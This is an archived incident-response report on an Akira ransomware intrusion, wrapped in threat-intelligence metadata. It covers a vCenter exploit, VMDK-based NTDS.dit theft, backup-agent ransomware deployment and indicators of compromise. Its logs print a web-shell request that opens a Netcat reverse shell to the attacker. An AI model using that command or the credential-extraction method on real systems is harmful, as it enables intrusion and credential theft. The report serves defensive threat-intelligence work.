{
	"id": "172ef0b8-83b4-4c3a-abbe-501739fd78e8",
	"created_at": "2026-04-06T00:17:56.270926Z",
	"updated_at": "2026-04-10T03:27:57.405311Z",
	"deleted_at": null,
	"sha1_hash": "2bbfdbe11c8ddf50083ed2a389bb6c3c1b4c41f8",
	"title": "Uncovering Akira's privilege escalation techniques",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 823390,
	"plain_text": "Uncovering Akira's privilege escalation techniques\r\nBy Callum Wilson\r\nPublished: 2024-05-14 · Archived: 2026-04-05 16:03:32 UTC\r\nIn this special Cyber Intelligence Briefing, our cyber experts at S-RM, Ineta Simkunaite and Callum Wilson, unravel a recent encounter with the Akira ransomware group. Their review unveils a novel privilege escalation technique used by attackers. This method leverages the victim’s virtual infrastructure to exfiltrate the NTDS.dit file from domain controllers, paving the way for a swift attack.\r\nWho is Akira?\r\nSince emerging onto the cyber scene in March 2023, Akira has honed its sights on small to medium-sized organisations across North America, Europe, and Australia. The group's Tactics, Techniques and Procedures (TTPs) typically involve infiltrating target organisations via their VPNs, either by exploiting compromised credentials or vulnerabilities within the VPN software.\r\nThe initial steps\r\nS-RM’s Incident Response team was called to a breach of a multinational agriculture company in early 2024, where we identified the threat actor as Akira. We traced the initial intrusion to an unpatched single-factor VPN appliance, which served as a gateway into the network. Once connected via the VPN, the threat actor leveraged a remote code execution (RCE) vulnerability (CVE-2021-21972) in the VMware vCenter server.[1] This vulnerability affects the ‘uploadOVA’ function, allowing unauthenticated attackers to upload malicious files to the vulnerable ‘/ui/vropspluginui/rest/services/*’ endpoint. This enabled the threat actor to implant a reverse shell, providing remote access to the vCenter server.\r\nThe snippet below depicts how Akira was able to install a malicious file named ‘healthcheck_beat.jsp’ on the vulnerable system, laying the groundwork for their full-blown attack. 
We also found that they established a reverse shell connection, using the command-line tool Netcat, to the IP address that had been assigned to the attacker’s device upon successful VPN authentication.\r\n\"POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1\" 200 17\r\n\"GET /ui/resources/healthcheck_beat.jsp HTTP/1.1\" 200 179\r\n\"GET /ui/resources/healthcheck_beat.jsp?cmd=nc+[IP address]+-e+sh HTTP/1.1\" 200 212\r\nHaving gained access to the company’s vCenter, Akira proceeded to create a new virtual machine on a VMware ESXi hypervisor. The fresh virtual machine gave Akira a nearly invisible playground from which to run their operations, evading detection by conventional Endpoint Detection and Response (EDR) tools.\r\nhttps://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques\r\nPage 1 of 5\n\nThe ESXi hypervisor hostd.log file showed the virtual machine (VM) creation event using the default vCenter administrator account administrator@vsphere.local:\r\nhostd[2099736] [Originator@6876 sub=Vmsvc opID=[ID-HIDDEN] user=vpxuser:VSPHERE.LOCAL\\Administrator] Create VM initiated [34]: /vmfs/volumes/5b436991-ec18bcd8-4657-246e96c59f00/New Virtual Machine/New Virtual Machine.vmx\r\nPrivilege escalation and gaining full control\r\nDespite acquiring local administrator privileges on the newly spawned VM, Akira sought elevated access for lateral movement across the target domain. Their approach involved extracting credentials from the NTDS.dit file, the Active Directory database that resides on each domain controller and stores user account data, including password hashes. Because the operating system protects it, the file cannot simply be opened or copied by users. To further protect the data within the database, it is encrypted using a key stored in the SYSTEM registry hive. 
Although various attacker techniques exist to dump hashes from the NTDS.dit file, these typically require elevated privileges.\r\nTo circumvent the VMDK file's protections, Akira first temporarily powered down the domain controller's virtual machine. Then they copied the associated VMDK files to a separate directory and attached these copied virtual hard drives to the newly created VM. By doing so, they were able to copy the NTDS.dit file and compress it using 7-zip. Additionally, the threat actor was able to exfiltrate the SYSTEM hive, providing them with the decryption key for the password hashes. Attackers would then have been able to crack the hashes or use ‘pass-the-hash’ methods for user authentication. By taking this novel series of steps to extract the NTDS.dit file, Akira was able to compromise a highly privileged domain administrator's account. Armed with these credentials, Akira navigated swiftly across the network, compromising additional user accounts, exfiltrating data and deploying the ransomware, all in under 6 hours. See below for the attack chain:\r\nFigure 1: The attack chain identified by S-RM during its forensic investigation into the incident.\r\nSeizing opportunities: Exploiting legacy infrastructure for ransomware deployment\r\nAkira deployed ransomware in two ways: via network shares and via remote backup services. 
Specifically, the threat actor leveraged the legitimate Veritas Backup Exec client process ‘beremote.exe’ to deploy a randomly generated 8-character ransomware binary (for example ‘GkdrqaEP.exe’) to servers where the backup software was present. While exploiting network shares or installing remote services (such as using the PsExec[2] or DWAgent[3] tools) for ransomware deployment is common practice among ransomware groups, leveraging remote backup tasks is somewhat rare. This is generally because, upon gaining access to backup infrastructure, attackers often aim to destroy it to hinder subsequent recovery efforts. In this scenario, however, it was not the primary backup solution but a legacy one, which was still present on a minor subset of devices. This backup service, already part of the organisation’s ecosystem, likely served as a means to bypass security defences.\r\nFollowing the footsteps\r\nThe sophistication exhibited by Akira in evading detection, escalating privileges and moving laterally echoes the tactics of the China-backed threat actor group UTA0178 (as documented by Volexity).[4] Notably, UTA0178 previously employed a similar technique, leveraging virtual hard drive backups of domain controllers to extract the NTDS.dit file. These parallels underscore the evolving complexity of ransomware-as-a-service threat actor groups.\r\nLessons learned\r\nThe Akira ransomware group's recent exploits serve as a stark reminder that attackers are constantly scanning for vulnerabilities to exploit and will invariably choose the path of least resistance. Their innovation and adaptability mean that no opportunity is left unexploited. 
Therefore, it's crucial to maintain updated security, both for the external perimeter and for in-network devices, by implementing regular security updates and a robust patch management system. This practice not only aids in averting fast lateral movement across the environment but also grants additional time to respond effectively. Other measures such as multi-factor authentication, a consistent patching policy, and regular security assessments can go a long way in mitigating the risk of falling victim to ransomware attacks like those orchestrated by Akira. Finally, for organisations and security professionals interested in further malicious activities spotted during our investigation, please see the Indicators of Compromise (IOC) table below.\r\nTable 1: Indicators of Compromise\r\nThe S-RM team identified the following IOCs during the investigation:\r\nHost-based IOCs\r\nIndicator name | Description | SHA1\r\nakira_readme.txt | Ransom note | Hash was not retrievable\r\nanydesk.exe | Remote access and management software | Hash was not retrievable\r\nfile.bat | Script used to download RustDesk from GitHub, install it, create a service for persistence, and modify firewall rules to allow unrestricted outgoing and incoming RustDesk traffic | 6e7ad80da2f43af160dad06cd54805ee0ea1bd83\r\nfile.e | Ransomware payload | Hash was not retrievable\r\nhealthcheck_beat.jsp | JSP web shell that allowed commands to be run on the compromised vCenter server | Hash was not retrievable\r\nnetscan.exe | Network scanning tool | Hash was not retrievable\r\npGLkEvoo.exe | Randomly generated 8-character ransomware binary | Each ransomware binary had a different hash
\r\nrustdesk.exe | Remote access and management software | 0f5f4ab3572e194340d887b02068357149b86ac2\r\nw.exe | Ransomware binary | 422613a3ef460dc829ae26f50a0e905adf28ba81\r\nwinrar.exe | Data compression tool | 151c8b4295630a71f2c1bed76326055100378b66\r\nwinscp.exe | File transfer tool | 078301fc29aa6ca907ad956145d62a4d67d1e917\r\nNetwork-based IOCs\r\nIP address/domain | Description\r\nhttp[:]//repairdll[.]net/jHKIOEyC/ | C2 domain\r\n[1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n[2] PsExec is a command-line tool that allows users to run programs on remote systems.\r\n[3] DWAgent is an open-source remote access and management software.\r\n[4] https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/\r\nPlease do not hesitate to reach out to S-RM if you have any questions on this threat intelligence or wider cyber security concerns.\r\nSource: https://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques"
	],
	"report_names": [
		"uncovering-akira-privilege-escalation-techniques"
	],
	"threat_actors": [
		{
			"id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8",
			"created_at": "2024-01-18T02:02:34.643994Z",
			"updated_at": "2026-04-10T02:00:04.959645Z",
			"deleted_at": null,
			"main_name": "UNC5221",
			"aliases": [
				"UNC5221",
				"UTA0178"
			],
			"source_name": "ETDA:UNC5221",
			"tools": [
				"BRICKSTORM",
				"GIFTEDVISITOR",
				"GLASSTOKEN",
				"LIGHTWIRE",
				"PySoxy",
				"THINSPOOL",
				"WARPWIRE",
				"WIREFIRE",
				"ZIPLINE"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9",
			"created_at": "2024-01-12T02:00:04.33082Z",
			"updated_at": "2026-04-10T02:00:03.517264Z",
			"deleted_at": null,
			"main_name": "UTA0178",
			"aliases": [
				"UNC5221",
				"Red Dev 61"
			],
			"source_name": "MISPGALAXY:UTA0178",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8c8fea8c-c957-4618-99ee-1e188f073a0e",
			"created_at": "2024-02-02T02:00:04.086766Z",
			"updated_at": "2026-04-10T02:00:03.563647Z",
			"deleted_at": null,
			"main_name": "Storm-1567",
			"aliases": [
				"Akira",
				"PUNK SPIDER",
				"GOLD SAHARA"
			],
			"source_name": "MISPGALAXY:Storm-1567",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84",
			"created_at": "2024-04-24T02:00:49.516358Z",
			"updated_at": "2026-04-10T02:00:05.309426Z",
			"deleted_at": null,
			"main_name": "Akira",
			"aliases": [
				"Akira",
				"GOLD SAHARA",
				"PUNK SPIDER",
				"Howling Scorpius"
			],
			"source_name": "MITRE:Akira",
			"tools": [
				"Mimikatz",
				"PsExec",
				"AdFind",
				"Akira _v2",
				"Akira",
				"Megazord",
				"LaZagne",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434676,
	"ts_updated_at": 1775791677,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2bbfdbe11c8ddf50083ed2a389bb6c3c1b4c41f8.pdf",
		"text": "https://archive.orkl.eu/2bbfdbe11c8ddf50083ed2a389bb6c3c1b4c41f8.txt",
		"img": "https://archive.orkl.eu/2bbfdbe11c8ddf50083ed2a389bb6c3c1b4c41f8.jpg"
	}
}